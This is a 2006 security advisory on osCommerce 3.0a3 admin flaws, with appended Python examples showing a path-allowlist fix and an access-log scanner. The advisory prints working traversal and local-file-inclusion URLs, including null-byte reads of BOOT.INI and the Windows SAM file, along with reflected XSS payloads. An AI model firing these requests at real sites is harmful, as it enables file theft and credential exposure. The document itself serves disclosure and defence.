############################################
Oscommerce traversal arbitrary file access
Vendor: http://www.oscommerce.com/about/news,125
Advisory: http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
Vendor notify: NO
Exploit available: YES
###########################################

osCommerce contains a flaw that allows remote directory traversal and arbitrary file access. The flaw exists because the application does not validate the filter variable upon submission to the admin/templates_boxes_layout.php script. This could allow a remote authenticated administrator to craft a URL containing '../' directory traversal sequences and view files on the target system with the privileges of the web service.

####################
versions
####################
Oscommerce 3.0a3

###################
SOLUTION
###################
No solution was available at this time.

################
timeline
################
Discovered: 11-11-2006
vendor notify: -----
vendor response: ----
disclosure: 07-12-2006

#################
Examples
#################

######################
traversal file access
######################
When we try to open

http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=[SOME WORD]&lID=27

the application returns a full path disclosure together with this error:

Warning: require(includes/templates/[SOME WORD].php) [function.require]: failed to open stream: No such file or directory in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

Fatal error: require() [function.require]: Failed opening required 'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear') in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

The application appends the .php extension to our [SOME WORD] and searches for the file in a folder inside the web server root. We can therefore include any PHP file located on the web server in the application, and it is executed (local file inclusion):

http://[victim]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27

To read a file outside the web server folder that does not have a .php extension, we can test with a null byte, which drops the appended extension:

&filter=../../../../file.extension%00

For example, to look for boot.ini on a Windows system:

http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=content&filter=../../../../windows/repair/sam%00&lID=27

#####################
Cross site scripting
#####################
http://localhost/oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product

########################
End
#####################
Thanks to Estrella for being my light.
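The include pattern the advisory describes, modelled in Python as an added example (this is not osCommerce code; the directory layout, the ADMIN_DIR and TEMPLATE_DIR paths and the ALLOWED_TEMPLATES names are constructed for the illustration). unsafe_template_path shows where an unvalidated filter value ends up once the extension is appended and a NUL byte truncates the string, as PHP 5 of that era did; safe_template_path is the fix a maintainer would apply: an allowlist of template names followed by a containment check on the resolved path.

```python
"""
Added example, not osCommerce code: models the unvalidated `filter` ->
template path mapping described in the advisory, next to an allowlist-based
replacement. All directory names here are constructed for illustration.
"""
import os
import re
from typing import FrozenSet, Optional
from urllib.parse import unquote

# Constructed layout: the admin script requires templates relative to its own
# directory, as the advisory's error message ('includes/templates/...php') shows.
ADMIN_DIR = "/var/www/oscommerce/admin"
TEMPLATE_DIR = os.path.join(ADMIN_DIR, "includes", "templates")

# Hypothetical allowlist of template names the script legitimately accepts.
ALLOWED_TEMPLATES: FrozenSet[str] = frozenset({"boxes", "content"})


def unsafe_template_path(filter_value: str) -> str:
    """Path the vulnerable pattern ends up requiring.

    The raw parameter is concatenated into the path and '.php' is appended with
    no validation. A %00 in the value reproduces the PHP 5 behaviour the
    advisory relies on: the C-level string ends at the NUL, so the appended
    extension is discarded.
    """
    relative = "includes/templates/" + unquote(filter_value) + ".php"
    relative = relative.split("\x00", 1)[0]          # NUL truncation
    return os.path.normpath(os.path.join(ADMIN_DIR, relative))


SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")


def safe_template_path(filter_value: str,
                       allowed: FrozenSet[str] = ALLOWED_TEMPLATES) -> Optional[str]:
    """Hardened resolution: allowlist the name, then confirm the resolved path
    is still inside TEMPLATE_DIR. Returns None for anything that fails."""
    name = unquote(filter_value)
    # 1. Only a plain identifier that is on the allowlist is acceptable. This
    #    alone rules out '/', '..' and NUL bytes.
    if not SAFE_NAME.fullmatch(name) or name not in allowed:
        return None
    # 2. Defence in depth: resolve and check containment anyway, so a later
    #    change to the allowlist cannot silently reintroduce traversal.
    base = os.path.realpath(TEMPLATE_DIR)
    candidate = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("boxes", "../../../../BOOT.INI%00"):
        print(f"{value!r:28} unsafe -> {unsafe_template_path(value)}")
        print(f"{'':28} safe   -> {safe_template_path(value)}")
```

Running the block prints the two resolutions side by side: the benign name resolves to the same file under both functions, while the traversal value lands four directories above the admin folder with the unsafe mapping and is rejected outright by the safe one. The allowlist does the real work; the realpath containment check is there so that a future edit which relaxes the allowlist still cannot reach outside the templates directory.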
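Since the advisory offers no fix, operators of an affected admin panel are left with detection. The request patterns listed above are easy to pick out of web-server access logs; the following is an added example, not part of the advisory: a small Python scanner over constructed common-log-format lines that flags traversal sequences and NUL bytes in any query parameter, and script tags in any parameter. The log lines, client addresses and function names are constructed for this illustration.

```python
"""
Added example, not from the advisory: flag the request patterns the advisory
lists (directory traversal and NUL truncation in query parameters, script tags
in any parameter) in web-server access logs. Log lines are constructed.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in common log format; only the request target
# matters here. Lines 1 and 4 are benign, lines 2 and 3 mirror the advisory's URLs.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Dec/2006:10:00:01 +0100] "GET /oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=boxes&lID=27 HTTP/1.1" 200 5120
192.0.2.11 - - [07/Dec/2006:10:00:02 +0100] "GET /oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=../../../../BOOT.INI%00&lID=27 HTTP/1.1" 200 611
192.0.2.12 - - [07/Dec/2006:10:00:03 +0100] "GET /oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E HTTP/1.1" 200 9000
192.0.2.13 - - [07/Dec/2006:10:00:04 +0100] "GET /oscommerce/admin/products.php?pID=1&action=new_product HTTP/1.1" 200 7000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def classify_request(line: str) -> List[str]:
    """Return human-readable findings for one log line (empty if benign)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    findings: List[str] = []
    # parse_qsl percent-decodes once; decode a second time so values that were
    # double-encoded to slip past a naive filter are still inspected in clear.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = unquote(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal in {name}")
        if "\x00" in value:
            findings.append(f"NUL byte in {name}")
        if SCRIPT_RE.search(value):
            findings.append(f"script tag in {name}")
    return findings


def scan_log(text: str) -> List[Tuple[str, List[str]]]:
    """Scan a whole log; return (client_ip, findings) for flagged lines only."""
    hits: List[Tuple[str, List[str]]] = []
    for line in text.splitlines():
        findings = classify_request(line)
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```

The scanner inspects every decoded parameter rather than just filter, because the XSS examples above land in set, selected_box, lID and pID. Matching on decoded values is what makes the %00 and %3Cscript%3E encodings visible; a rule that grepped the raw request line for "../" would miss the percent-encoded variants.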
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....